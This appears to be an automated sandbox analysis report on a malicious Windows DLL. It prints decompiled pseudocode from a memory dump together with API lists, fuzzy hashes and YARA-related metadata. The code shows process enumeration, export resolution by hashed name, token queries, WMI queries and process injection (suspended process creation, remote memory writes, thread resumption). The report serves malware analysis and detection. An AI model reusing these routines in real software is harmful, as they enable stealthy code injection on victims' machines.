CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 1000ABBD
memset.MSVCRT ref: 1000ABD6
Process32First.KERNEL32(00000000,?), ref: 1000ABED
Process32Next.KERNEL32(00000000,?), ref: 1000AC21
CloseHandle.KERNEL32(00000000), ref: 1000AC2E

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32memset
String ID:
API String ID: 1267121359-0
Opcode ID: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
Instruction ID: 824b075522648d78722121d86b555edf1df252a9305654497386a44dc5d3d608
Opcode Fuzzy Hash: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
Instruction Fuzzy Hash: B11191732043556BF710DB68DC89E9F37ECEB863A0F560A29F624CB181EB30D9058762

Uniqueness

Uniqueness Score: -1.00%

Function 1000DFAD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000DFAD(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E1000D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

APIs

LoadLibraryA.KERNEL32(.dll), ref: 1000E07D
GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 1000E089

Strings

.dll, xrefs: 1000E079, 1000E07C

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll
API String ID: 2574300362-2738580789
Opcode ID: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
Instruction ID: 6da95daea6e89431fe10e6910c52a9851ea62cfcad36df982cd2ab94b172e300
Opcode Fuzzy Hash: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
Instruction Fuzzy Hash: F631E431A002998BEB54CFA9C8847AEBBF5EF44384F24446DD905E7349D770ED81C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000CA25, Relevance: 4.6, APIs: 3, Instructions: 120
threadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000CA25(intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v36;
				char _v40;
				char _v80;
				char _t37;
				intOrPtr _t38;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t54;
				intOrPtr _t57;
				long _t61;
				intOrPtr _t62;
				signed int _t65;
				signed int _t68;
				signed int _t82;
				void* _t85;
				char _t86;

				_v8 = _v8 & 0x00000000;
				_v20 = __edx;
				_t65 = 0;
				_t37 = E1000C8FD( &_v8);
				_t86 = _t37;
				_v24 = _t86;
				_t87 = _t86;
				if(_t86 == 0) {
					return _t37;
				}
				_t38 =  *0x1001e688; // 0x7900590
				E1000A86D( &_v80,  *((intOrPtr*)(_t38 + 0xac)) + 7, _t87);
				_t82 = _v8;
				_t68 = 0;
				_v16 = 0;
				if(_t82 == 0) {
					L20:
					E1000861A( &_v24, 0);
					return _t65;
				}
				while(_t65 == 0) {
					while(_t65 == 0) {
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t45 = E1000AE66( *((intOrPtr*)(_t86 + _t68 * 4)),  &_v40); // executed
						_t92 = _t45;
						if(_t45 >= 0) {
							_t54 = E1000CB77(E10005CEC,  &_v40, _t92, _v20); // executed
							if(_t54 != 0) {
								_t57 =  *0x1001e684; // 0x797faa0
								_t85 =  *((intOrPtr*)(_t57 + 0xc4))(0, 0, 0,  &_v80);
								if(_t85 != 0) {
									GetLastError();
									_t61 = ResumeThread(_v36);
									_t62 =  *0x1001e684; // 0x797faa0
									if(_t61 != 0) {
										_push(0xea60);
										_push(_t85);
										if( *((intOrPtr*)(_t62 + 0x2c))() == 0) {
											_t65 = _t65 + 1;
										}
										_t62 =  *0x1001e684; // 0x797faa0
									}
									CloseHandle(_t85);
								}
							}
						}
						if(_v40 != 0) {
							if(_t65 == 0) {
								_t52 =  *0x1001e684; // 0x797faa0
								 *((intOrPtr*)(_t52 + 0x104))(_v40, _t65);
							}
							_t48 =  *0x1001e684; // 0x797faa0
							 *((intOrPtr*)(_t48 + 0x30))(_v36);
							_t50 =  *0x1001e684; // 0x797faa0
							 *((intOrPtr*)(_t50 + 0x30))(_v40);
						}
						_t68 = _v16;
						_t47 = _v12 + 1;
						_v12 = _t47;
						if(_t47 < 2) {
							continue;
						} else {
							break;
						}
					}
					_t82 = _v8;
					_t68 = _t68 + 1;
					_v16 = _t68;
					if(_t68 < _t82) {
						continue;
					} else {
						break;
					}
					do {
						goto L19;
					} while (_t82 != 0);
					goto L20;
				}
				L19:
				E1000861A(_t86, 0xfffffffe);
				_t86 = _t86 + 4;
				_t82 = _t82 - 1;
			}

APIs

Part of subcall function 1000AE66: memset.MSVCRT ref: 1000AE85
Part of subcall function 1000AE66: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5

Part of subcall function 1000CB77: memset.MSVCRT ref: 1000CBB8
Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
Part of subcall function 1000CB77: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
Part of subcall function 1000CB77: FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73

GetLastError.KERNEL32(?,00000001), ref: 1000CACC
ResumeThread.KERNEL32(?,?,00000001), ref: 1000CADA
CloseHandle.KERNEL32(00000000,?,00000001), ref: 1000CAFD

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: MemoryVirtual$Protectmemset$CloseCreateErrorFreeHandleLastLibraryProcessResumeThreadWrite
String ID:
API String ID: 1274669455-0
Opcode ID: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
Instruction ID: 8d942f140de3fd5d428a133cfbe882c53197cdce90259c44b1bbe97365db357f
Opcode Fuzzy Hash: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
Instruction Fuzzy Hash: AF417E31A00319AFEB01DFA8C985EAE77F9FF58390F124168F501E7265DB30AE058B51

Uniqueness

Uniqueness Score: -1.00%

Function 1000B998, Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E1000B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E10008604(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E1000861A( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}

APIs

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9E9

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$AllocErrorHeapLast
String ID:
API String ID: 4258577378-0
Opcode ID: 25ca12ee674f2655c61ae174559f6c02d40ec3235ed2cc3a33db728961b5c84c
Instruction ID: 0e837ad5d344672522dd0af1a739acbaf95446ba78b21159f473d30cfb6f5d1d
Opcode Fuzzy Hash: 25ca12ee674f2655c61ae174559f6c02d40ec3235ed2cc3a33db728961b5c84c
Instruction Fuzzy Hash: 8E01A27260066ABFAB24DFA6CC89D8F7FECEB456E17120225F605D3124E630DE00C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000AE66, Relevance: 3.0, APIs: 2, Instructions: 46
processCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E1000AE66(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;
				WCHAR* _t15;
				int _t19;
				struct _PROCESS_INFORMATION* _t20;

				_t20 = __edx;
				_t15 = __ecx;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t19 = 0x44;
				memset( &_v72, 0, _t19);
				_v72.cb = _t19;
				_t11 = CreateProcessW(0, _t15, 0, 0, 0, 4, 0, 0,  &_v72, _t20);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}

0x1000ae6f
0x1000ae75
0x1000ae79
0x1000ae7a
0x1000ae7b
0x1000ae7c
0x1000ae80
0x1000ae85
0x1000ae8d
0x1000aea5
0x1000aeab
0x1000aeb3

APIs

memset.MSVCRT ref: 1000AE85
CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateProcessmemset
String ID:
API String ID: 2296119082-0
Opcode ID: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
Instruction ID: 8cd7357356a5339f89587e4f6554bd087a86913dd4092c53185382899a550088
Opcode Fuzzy Hash: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
Instruction Fuzzy Hash: 63F012F26041187FF760D6ADDC46EBB77ACC789654F104532FA05D6190E560ED058161

Uniqueness

Uniqueness Score: -1.00%

Function 1000E1BC, Relevance: 3.0, APIs: 2, Instructions: 35
libraryCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E1000E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E100095C7(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E1000E171(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E100085C2( &_v8);
				return _t25;
			}

0x1000e1bf
0x1000e1c2
0x1000e1c8
0x1000e1ca
0x1000e1cf
0x1000e1d1
0x1000e1db
0x1000e1dc
0x1000e1eb
0x1000e1de
0x1000e1de
0x1000e1de
0x1000e1ef
0x1000e1f6
0x1000e1fc
0x1000e1fc
0x1000e201
0x1000e20c

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1DE
LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1EB

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
Instruction ID: 73ed2ebf8e11191eb6597406948a09e9f6d4d80ef2ff5e7d934a0b04cc0c2bea
Opcode Fuzzy Hash: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
Instruction Fuzzy Hash: 92F08231704254ABE704DB69DC8589EB7EDEB547D1710402AF406E3255DA70DE0087A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000CCC0, Relevance: 2.5, APIs: 2, Instructions: 48
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000CCC0(void* __ecx, intOrPtr _a4, signed int _a8) {
				CHAR* _v8;
				int _t28;
				signed int _t31;
				signed int _t34;
				signed int _t35;
				void* _t38;
				signed int* _t41;

				_t41 = _a8;
				_t31 = 0;
				if(_t41[1] > 0) {
					_t38 = 0;
					do {
						_t3 =  &(_t41[2]); // 0xe6840d8b
						_t34 =  *_t3;
						_t35 = 0;
						_a8 = 0;
						if( *((intOrPtr*)(_t38 + _t34 + 8)) > 0) {
							_v8 = _a4 + 0x24;
							while(1) {
								_t28 = lstrcmpiA(_v8,  *( *((intOrPtr*)(_t38 + _t34 + 0xc)) + _t35 * 4));
								_t14 =  &(_t41[2]); // 0xe6840d8b
								_t34 =  *_t14;
								if(_t28 == 0) {
									break;
								}
								_t35 = _a8 + 1;
								_a8 = _t35;
								if(_t35 <  *((intOrPtr*)(_t34 + _t38 + 8))) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t41 =  *_t41 |  *(_t34 + _t38);
						}
						L8:
						_t31 = _t31 + 1;
						_t38 = _t38 + 0x10;
						_t20 =  &(_t41[1]); // 0x1374ff85
					} while (_t31 <  *_t20);
				}
				Sleep(0xa);
				return 1;
			}

APIs

lstrcmpi.KERNEL32(?,?,00000128,00000000,?,?,?,1000AC0D,?,?), ref: 1000CCF4
Sleep.KERNEL32(0000000A,00000000,?,?,?,1000AC0D,?,?), ref: 1000CD26

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Sleeplstrcmpi
String ID:
API String ID: 1261054337-0
Opcode ID: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
Instruction ID: cde0d477192250e791ba25b7cb0ca9c4b7eae4faf087914376a22588bee842ac
Opcode Fuzzy Hash: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
Instruction Fuzzy Hash: 21018031600709EFEB10DF69C884D5AB7E5FF843A4725C47AE95A8B215D730E942DB50

Uniqueness

Uniqueness Score: -1.00%

Function 10005E96, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10005E96() {
				intOrPtr _t3;

				_t3 =  *0x1001e684; // 0x797faa0
				 *((intOrPtr*)(_t3 + 0x2c))( *0x1001e6a8, 0xffffffff);
				ExitProcess(0);
			}

0x10005e96
0x10005ea3
0x10005ead

APIs

ExitProcess.KERNEL32(00000000), ref: 10005EAD

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
Instruction ID: 9fe5a48d1d7df1d44c8ff89900a8b99800cce3c20b8b2062506d45ae6f81fc06
Opcode Fuzzy Hash: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
Instruction Fuzzy Hash: D4C002712151A1AFEA409BA4CD88F0877A1AB68362F9282A5F5259A1F6CA30D8009B11

Uniqueness

Uniqueness Score: -1.00%

Function 100085EF, Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100085EF() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x1001e768 = _t1;
				return _t1;
			}

0x100085f8
0x100085fe
0x10008603

APIs

HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
Instruction ID: f703af9baad619bee9f37dfa55c6143b3da77678d96310d0b12c6411cce6613a
Opcode Fuzzy Hash: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
Instruction Fuzzy Hash: B9B012B0A8471096F2901B204C86B047550A308B0AF308001F708581D0C6B05104CB14

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1000DB3C, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E1000DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E1000D523(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E10008604(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E1000861A( &_v60, 0xfffffffe);
					E1000D5D7( &_v104);
					return _t320;
				}
				_t165 = E100095E1(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E100095E1(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E100092E5(_t165);
				_v60 = _t322;
				E100085D5( &_v52);
				E100085D5( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E100095E1(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E100085D5( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E1000861A( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E100091E3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E100091E3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E10008698(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E10008604( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E1000861A(_t136, 0);
								E1000861A( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E100091E3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E100095E1(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E100095E1(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E100085D5( &_v92);
											E100085D5( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E10009640();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E100095E1(_t283, 0x219);
										E10009640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E100085D5( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E100091E3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E1000DA20( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E1000861A( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}

APIs

Part of subcall function 1000D523: CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
Part of subcall function 1000D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
Part of subcall function 1000D523: CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
Part of subcall function 1000D523: SysAllocString.OLEAUT32(00000000), ref: 1000D569
